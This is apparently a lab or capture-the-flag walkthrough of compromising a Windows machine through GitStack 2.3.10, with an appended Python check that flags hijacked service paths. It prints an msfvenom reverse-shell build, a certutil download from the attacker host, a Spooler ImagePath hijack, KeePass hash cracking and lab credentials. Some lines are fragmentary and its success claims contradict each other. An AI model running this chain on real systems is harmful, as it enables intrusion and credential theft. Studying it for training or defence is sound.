Machine IP address: 172.31.1.12

```
Open 172.31.1.12:80
Open 172.31.1.12:139
Open 172.31.1.12:135
Open 172.31.1.12:445
Open 172.31.1.12:3389
Open 172.31.1.12:5985
Open 172.31.1.12:47001
Open 172.31.1.12:49152
Open 172.31.1.12:49153
Open 172.31.1.12:49154
Open 172.31.1.12:49155
Open 172.31.1.12:49162
Open 172.31.1.12:49163
Open 172.31.1.12:49164
```

Port 80 is a Django site. The URL patterns it exposes:

```
^registration/login/$
^gitstack/
^rest/
```

```
gitstack 2.3.10
searchsploit gitstack
```

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.33 LPORT=23 -f exe -o rev.exe
```

Change the payload's command from `whoami` to:

```
certutil -urlcache -split -f http://10.10.0.33/rev.exe
```

and we get a reverse shell.

```
type C:\Windows\Panther\Unattend.xml
```

Passes present in the file: `generalize`, `oobeSystem`, `specialize`.

```
C:\Users\john\Documents\password_manager.kdbx
<DatabasePath>..\..\Users\john\Documents\Database2.kdbx</DatabasePath>
<DatabasePath>..\..\Users\john\Documents\Database.kdbx</DatabasePath>
C:\Users\john\AppData\Roaming\KeePass\KeePass.config.xml
C:\Program Files (x86)\KeePass Password Safe 2\KeePass.config.xml
```

```
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler
```

```
reg add HKLM\SYSTEM\CurrentControlSet\Services\Spooler /v ImagePath /t REG_EXPAND_SZ /d C:\users\john\desktop\rev.exe /f
```

rp wp

```
sc start spooler
```

```
keepass2john pass.kdbx >> hash
```
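A defender-side check for the Spooler step above, added here and not part of the original notes: it parses the output shape of `reg query <key> /v ImagePath` (a constructed sample, not captured from this box) and flags any service whose binary sits outside the Windows or Program Files trees, which is exactly what the modified Spooler `ImagePath` would trigger. The non-Spooler service names and the environment-variable table are assumptions.

```python
import re

# Constructed sample in the shape of `reg query <key> /v ImagePath` output
# (not captured from the machine in this writeup). The first entry mirrors
# the modified Spooler value; the other two are typical benign services.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler
    ImagePath    REG_EXPAND_SZ    C:\users\john\desktop\rev.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\svchost.exe -k netsvcs -p

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleAgent
    ImagePath    REG_EXPAND_SZ    "C:\Program Files (x86)\Example Agent\agent.exe" --service
"""

# Fixed expansions (assumed defaults) so the check also runs off-box on an exported query.
ENV_VARS = {"systemroot": "C:\\Windows", "windir": "C:\\Windows",
            "programfiles": "C:\\Program Files"}
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def parse_reg_query(text):
    """Map service name -> raw ImagePath value from reg query output."""
    services, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.rstrip().rsplit("\\", 1)[-1]   # last key component = service
        m = re.match(r"\s+ImagePath\s+REG_\w+\s+(.*\S)", line)
        if m and current:
            services[current] = m.group(1)
    return services

def binary_path(image_path):
    """Strip quotes and arguments, expand known env vars, normalise to lower case."""
    if image_path.startswith('"'):
        exe = image_path[1:].split('"', 1)[0]
    else:
        m = re.match(r"(.*?\.exe)", image_path, re.IGNORECASE)
        exe = m.group(1) if m else image_path.split()[0]
    exe = re.sub(r"%(\w+)%", lambda v: ENV_VARS.get(v.group(1).lower(), v.group(0)), exe)
    return exe.lower()

def suspicious_services(text):
    """Return [(service, binary)] for every ImagePath outside the trusted roots."""
    return [(name, binary_path(value))
            for name, value in parse_reg_query(text).items()
            if not binary_path(value).startswith(TRUSTED_ROOTS)]

if __name__ == "__main__":
    for name, exe in suspicious_services(SAMPLE_REG_QUERY):
        print(f"{name}: ImagePath points outside trusted roots -> {exe}")
```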
```
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --show hash
```

The password is: princess

```
administrator : secur3_apass262
```

e3ce12b1bb796932868b0d793c9fac3c

Okay, thanks.

A note to commemorate my effort.

To prove that I changed it earlier, let me log in and try.

Finally, verify whether john's privilege escalation actually succeeded. Start it and log in:

```
xfreerdp /u:john /p:s3cret123SEc /v:172.31.1.12
```

Looks like it did not succeed...

It took about three hours, from roughly 9:30 to 12:30, before the privilege escalation finally succeeded.